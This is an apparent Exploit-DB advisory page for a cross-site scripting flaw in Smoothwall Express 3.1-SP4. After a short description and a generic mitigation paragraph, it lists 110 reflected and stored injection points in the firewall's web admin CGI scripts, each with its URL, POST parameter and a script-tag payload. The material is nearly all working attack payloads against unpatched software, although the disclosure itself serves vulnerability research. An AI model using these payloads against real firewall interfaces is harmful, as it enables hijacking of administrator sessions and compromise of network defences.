Smoothwall Express 3.1-SP4-polar-x86_64-update9 | Cross-Site Scripting

vendor:
Smoothwall Express
by:
Ozer Goker
8.8
CVSS
HIGH
Cross-Site Scripting
CWE
Product Name: Smoothwall Express
Affected Version From: 3.1-SP4-polar-x86_64-update9
Affected Version To: 3.1-SP4-polar-x86_64-update9
Patch Exists: NO
Related CWE: N/A
CPE: o:smoothwall:smoothwall_express:3.1-sp4-polar-x86_64-update9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: GNU/Linux
2019
Smoothwall Express 3.1-SP4-polar-x86_64-update9 | Cross-Site Scripting

Smoothwall Open Source Project was set up in 2000 to develop and maintain Smoothwall Express - a Free firewall that includes its own security-hardened GNU/Linux operating system and an easy-to-use web interface. The vulnerability is a Cross-Site Scripting (XSS) vulnerability which can be exploited by sending malicious payloads to the vulnerable parameters. The payloads are stored in the database and can be triggered when the vulnerable parameters are accessed. The vulnerability can be exploited by sending malicious payloads to the vulnerable parameters. The payloads are stored in the database and can be triggered when the vulnerable parameters are accessed.
Mitigation:

The best way to mitigate XSS attacks is to use a web application firewall (WAF) to filter out malicious requests. Additionally, developers should ensure that all user-supplied input is properly sanitized and validated before being used in the application.
Source
Exploit-DB raw data:

##################################################################################################################################
# Exploit Title: Smoothwall Express 3.1-SP4-polar-x86_64-update9 |
Cross-Site Scripting
# Date: 06.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.smoothwall.org
# Software Link: https://sourceforge.net/projects/smoothwall/files/SmoothWall/3.1%20SP4/Express-3.1-SP4-x86_64.iso/download
# Version: 3.1-SP4-polar-x86_64-update9
##################################################################################################################################

Introduction
The Smoothwall Open Source Project was set up in 2000 to develop and maintain Smoothwall Express - a Free firewall that includes its own security-hardened GNU/Linux operating system and an easy-to-use web interface.


#################################################################################

XSS details: Reflected & Stored

#################################################################################

XSS1 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
CACHE_SIZE

PAYLOAD
'><script>alert(1)</script>

#################################################################################

XSS2 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MAX_SIZE

PAYLOAD
'><script>alert(2)</script>

#################################################################################

XSS3 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MIN_SIZE

PAYLOAD
'><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MAX_OUTGOING_SIZE

PAYLOAD
'><script>alert(4)</script>

#################################################################################

XSS5 | Stored

URL
http://192.168.2.200:81/cgi-bin/proxy.cgi?

METHOD
Post

PARAMETER
MAX_INCOMING_SIZE

PAYLOAD
'><script>alert(5)</script>

#################################################################################

XSS6 | Stored

URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi

METHOD
Post

PARAMETER
REDIRECT_PAGE

PAYLOAD
'><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200:81/cgi-bin/urlfilter.cgi

METHOD
Post

PARAMETER
CHILDREN

PAYLOAD
'><script>alert(7)</script>

#################################################################################

XSS8 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
BOOT_SERVER

PAYLOAD
'><script>alert(8)</script>

#################################################################################

XSS9 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
BOOT_FILE

PAYLOAD
'><script>alert(9)</script>

#################################################################################

XSS10 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
BOOT_ROOT

PAYLOAD
'><script>alert(10)</script>

#################################################################################

XSS11 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
START_ADDR

PAYLOAD
'><script>alert(11)</script>

#################################################################################

XSS12 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
END_ADDR

PAYLOAD
'><script>alert(12)</script>

#################################################################################

XSS13 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DNS1

PAYLOAD
'><script>alert(13)</script>

#################################################################################

XSS14 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DNS2

PAYLOAD
'><script>alert(14)</script>

#################################################################################

XSS15 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NTP1

PAYLOAD
'><script>alert(15)</script>

#################################################################################

XSS16 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NTP2

PAYLOAD
'><script>alert(16)</script>

#################################################################################

XSS17 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
WINS1

PAYLOAD
'><script>alert(17)</script>

#################################################################################

XSS18 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
WINS2

PAYLOAD
'><script>alert(18)</script>

#################################################################################

XSS19 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DEFAULT_LEASE_TIME

PAYLOAD
'><script>alert(19)</script>

#################################################################################

XSS20 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
MAX_LEASE_TIME

PAYLOAD
'><script>alert(20)</script>

#################################################################################

XSS21 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
DOMAIN_NAME

PAYLOAD
'><script>alert(21)</script>

#################################################################################

XSS22 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NIS_DOMAIN

PAYLOAD
'><script>alert(22)</script>

#################################################################################

XSS23 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NIS1

PAYLOAD
'><script>alert(23)</script>

#################################################################################

XSS24 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
NIS2

PAYLOAD
'><script>alert(24)</script>

#################################################################################

XSS25 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_HOST

PAYLOAD
'><script>alert(25)</script>

#################################################################################

XSS26 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_DESC

PAYLOAD
'><script>alert(26)</script>

#################################################################################

XSS27 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_MAC

PAYLOAD
'><script>alert(27)</script>

#################################################################################

XSS28 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dhcp.cgi?

METHOD
Post

PARAMETER
STATIC_IP

PAYLOAD
'><script>alert(28)</script>

#################################################################################

XSS29 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
HOSTNAME

PAYLOAD
'><script>alert(29)</script>

#################################################################################

XSS30 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
DOMAIN

PAYLOAD
'><script>alert(30)</script>

#################################################################################

XSS31 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
LOGIN

PAYLOAD
'"><script>alert(31)</script>

#################################################################################

XSS32 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
PASSWORD

PAYLOAD
'><script>alert(32)</script>

#################################################################################

XSS33 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ddns.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(33)</script>

#################################################################################

XSS34 | Reflected

URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?

METHOD
Post

PARAMETER
IP

PAYLOAD
'"><script>alert(34)</script>

#################################################################################

XSS35 | Reflected

URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?

METHOD
Post

PARAMETER
HOSTNAME

PAYLOAD
'><script>alert(35)</script>

#################################################################################

XSS36 | Reflected

URL
http://192.168.2.200:81/cgi-bin/hosts.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(36)</script>

#################################################################################

XSS37 | Reflected

URL
http://192.168.2.200:81/cgi-bin/time.cgi?

METHOD
Post

PARAMETER
NTP_SERVER

PAYLOAD
'><script>alert(37)</script>

#################################################################################

XSS38 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
BATTLEVEL

PAYLOAD
'><script>alert(38)</script>

#################################################################################

XSS39 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
RTMIN

PAYLOAD
'><script>alert(39)</script>

#################################################################################

XSS40 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
BATTDELAY

PAYLOAD
'><script>alert(40)</script>

#################################################################################

XSS41 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
TO

PAYLOAD
'><script>alert(41)</script>

#################################################################################

XSS42 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
ANNOY

PAYLOAD
'><script>alert(42)</script>

#################################################################################

XSS43 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSIP

PAYLOAD
'><script>alert(43)</script>

#################################################################################

XSS44 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSNAME

PAYLOAD
'><script>alert(44)</script>

#################################################################################

XSS45 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSPORT

PAYLOAD
'><script>alert(45)</script>

#################################################################################

XSS46 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
POLLTIME

PAYLOAD
'><script>alert(46)</script>

#################################################################################

XSS47 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSUSER

PAYLOAD
'><script>alert(47)</script>

#################################################################################

XSS48 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
NISPORT

PAYLOAD
'><script>alert(48)</script>

#################################################################################

XSS49 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
UPSAUTH

PAYLOAD
'><script>alert(49)</script>

#################################################################################

XSS50 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
EMAIL

PAYLOAD
'><script>alert(50)</script>

#################################################################################

XSS51 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
FROM

PAYLOAD
'><script>alert(51)</script>

#################################################################################

XSS52 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
CC

PAYLOAD
'><script>alert(52)</script>

#################################################################################

XSS53 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
SMSEMAIL

PAYLOAD
'><script>alert(53)</script>

#################################################################################

XSS54 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
SMTPSERVER

PAYLOAD
'><script>alert(54)</script>

#################################################################################

XSS55 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
PORT

PAYLOAD
'><script>alert(55)</script>

#################################################################################

XSS56 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
USER

PAYLOAD
'><script>alert(56)</script>

#################################################################################

XSS57 | Reflected

URL
http://192.168.2.200:81/cgi-bin/apcupsd.cgi?

METHOD
Post

PARAMETER
EMAIL_PASSWORD

PAYLOAD
'"><script>alert(57)</script>

#################################################################################

XSS58 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
EXT

PAYLOAD
'><script>alert(58)</script>

#################################################################################

XSS59 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
SRC_PORT_SEL

PAYLOAD
'><script>alert(59)</script>

#################################################################################

XSS60 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
SRC_PORT

PAYLOAD
'><script>alert(60)</script>

#################################################################################

XSS61 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
DEST_IP

PAYLOAD
'><script>alert(61)</script>

#################################################################################

XSS62 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
DEST_PORT_SEL

PAYLOAD
'><script>alert(62)</script>

#################################################################################

XSS63 | Reflected

URL
http://192.168.2.200:81/cgi-bin/portfw.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(63)</script>

#################################################################################

XSS64 | Reflected

URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?

METHOD
Post

PARAMETER
MACHINE

PAYLOAD
'><script>alert(64)</script>

#################################################################################

XSS65 | Reflected

URL
http://192.168.2.200:81/cgi-bin/outgoing.cgi?

METHOD
Post

PARAMETER
MACHINECOMMENT

PAYLOAD
'><script>alert(65)</script>

#################################################################################

XSS66 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?

METHOD
Post

PARAMETER
SRC_IP

PAYLOAD
'><script>alert(66)</script>

#################################################################################

XSS67 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?

METHOD
Post

PARAMETER
DEST_IP

PAYLOAD
'><script>alert(67)</script>

#################################################################################

XSS68 | Reflected

URL
http://192.168.2.200:81/cgi-bin/dmzholes.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(68)</script>

#################################################################################

XSS69 | Reflected

URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?

METHOD
Post

PARAMETER
EXT

PAYLOAD
'><script>alert(69)</script>

#################################################################################

XSS70 | Reflected

URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?

METHOD
Post

PARAMETER
DEST_PORT

PAYLOAD
'><script>alert(70)</script>

#################################################################################

XSS71 | Reflected

URL
http://192.168.2.200:81/cgi-bin/xtaccess.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(71)</script>

#################################################################################

XSS72 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?

METHOD
Post

PARAMETER
SRC_IP

PAYLOAD
'><script>alert(72)</script>

#################################################################################

XSS73 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ipblock.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(73)</script>

#################################################################################

XSS74 | Reflected

URL
http://192.168.2.200:81/cgi-bin/timedaccess.cgi?

METHOD
Post

PARAMETER
MACHINES

PAYLOAD
'><script>alert(74)</script>

#################################################################################

XSS75 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
GREEN_ADDRESS

PAYLOAD
'><script>alert(75)</script>

#################################################################################

XSS76 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
GREEN_NETMASK

PAYLOAD
'><script>alert(76)</script>

#################################################################################

XSS77 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_DHCP_HOSTNAME

PAYLOAD
'><script>alert(77)</script>

#################################################################################

XSS78 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_ADDRESS

PAYLOAD
'><script>alert(78)</script>

#################################################################################

XSS79 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS1_OVERRIDE

PAYLOAD
'><script>alert(79)</script>

#################################################################################

XSS80 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS2_OVERRIDE

PAYLOAD
'><script>alert(80)</script>

#################################################################################

XSS81 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_MAC

PAYLOAD
'><script>alert(81)</script>

#################################################################################

XSS82 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
RED_NETMASK

PAYLOAD
'><script>alert(82)</script>

#################################################################################

XSS83 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DEFAULT_GATEWAY

PAYLOAD
'><script>alert(83)</script>

#################################################################################

XSS84 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS1

PAYLOAD
'><script>alert(84)</script>

#################################################################################

XSS85 | Reflected

URL
http://192.168.2.200:81/cgi-bin/interfaces.cgi?

METHOD
Post

PARAMETER
DNS2

PAYLOAD
'><script>alert(85)</script>

#################################################################################

XSS86 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
NAME

PAYLOAD
'><script>alert(86)</script>

#################################################################################

XSS87 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
LEFT

PAYLOAD
'><script>alert(87)</script>

#################################################################################

XSS88 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
LEFT_SUBNET

PAYLOAD
'><script>alert(88)</script>

#################################################################################

XSS89 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
RIGHT

PAYLOAD
'><script>alert(89)</script>

#################################################################################

XSS90 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
RIGHT_SUBNET

PAYLOAD
'><script>alert(90)</script>

#################################################################################

XSS91 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
SECRET1

PAYLOAD
'><script>alert(91)</script>

#################################################################################

XSS92 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
SECRET2

PAYLOAD
'><script>alert(92)</script>

#################################################################################

XSS93 | Reflected

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
COMMENT

PAYLOAD
'><script>alert(93)</script>

#################################################################################

XSS94 | Stored

URL
http://192.168.2.200:81/cgi-bin/vpnconn.cgi?

METHOD
Post

PARAMETER
filename

PAYLOAD
<script>alert(94)</script>

#################################################################################

XSS95 | Reflected

URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat

METHOD
Post

PARAMETER
SOURCE_IP

PAYLOAD
"><script>alert(95)</script>

#################################################################################

XSS96 | Stored

URL
http://192.168.2.200:81/cgi-bin/logs.cgi/proxylog.dat

METHOD
Post

PARAMETER
FILTER

PAYLOAD
'><script>alert(96)</script>

#################################################################################

XSS97 | Reflected

URL
http://192.168.2.200:81/cgi-bin/ipinfo.cgi?

METHOD
Post

PARAMETER
IP

PAYLOAD
'><script>alert(97)</script>

#################################################################################

XSS98 | Reflected

URL
http://192.168.2.200:81/cgi-bin/iptools.cgi?

METHOD
Post

PARAMETER
IP

PAYLOAD
'><script>alert(98)</script>

#################################################################################

XSS99 | Reflected

URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?

METHOD
Post

PARAMETER
WRAP

PAYLOAD
'><script>alert(99)</script>

#################################################################################

XSS100 | Reflected

URL
http://192.168.2.200:81/cgi-bin/smoothinfo.cgi?

METHOD
Post

PARAMETER
SECTIONTITLE

PAYLOAD
'><script>alert(100)</script>

#################################################################################

XSS101 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
INIT

PAYLOAD
'><script>alert(101)</script>

#################################################################################

XSS102 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
HANGUP

PAYLOAD
'><script>alert(102)</script>

#################################################################################

XSS103 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
SPEAKER_ON

PAYLOAD
'><script>alert(103)</script>

#################################################################################

XSS104 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
SPEAKER_OFF

PAYLOAD
'><script>alert(104)</script>

#################################################################################

XSS105 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
TONE_DIAL

PAYLOAD
'><script>alert(105)</script>

#################################################################################

XSS106 | Stored

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
PULSE_DIAL

PAYLOAD
'><script>alert(106)</script>

#################################################################################

XSS107 | Reflected

URL
http://192.168.2.200:81/cgi-bin/modem.cgi?

METHOD
Post

PARAMETER
TIMEOUT

PAYLOAD
'><script>alert(107)</script>

#################################################################################

XSS108 | Stored

URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?

METHOD
Post

PARAMETER
HOSTNAME

PAYLOAD
'><script>alert(108)</script>

#################################################################################

XSS109 | Stored

URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?

METHOD
Post

PARAMETER
KEYMAP

PAYLOAD
'><script>alert(109)</script>

#################################################################################

XSS110 | Stored

URL
http://192.168.2.200:81/cgi-bin/preferences.cgi?

METHOD
Post

PARAMETER
OPENNESS

PAYLOAD
'><script>alert(110)</script>

#################################################################################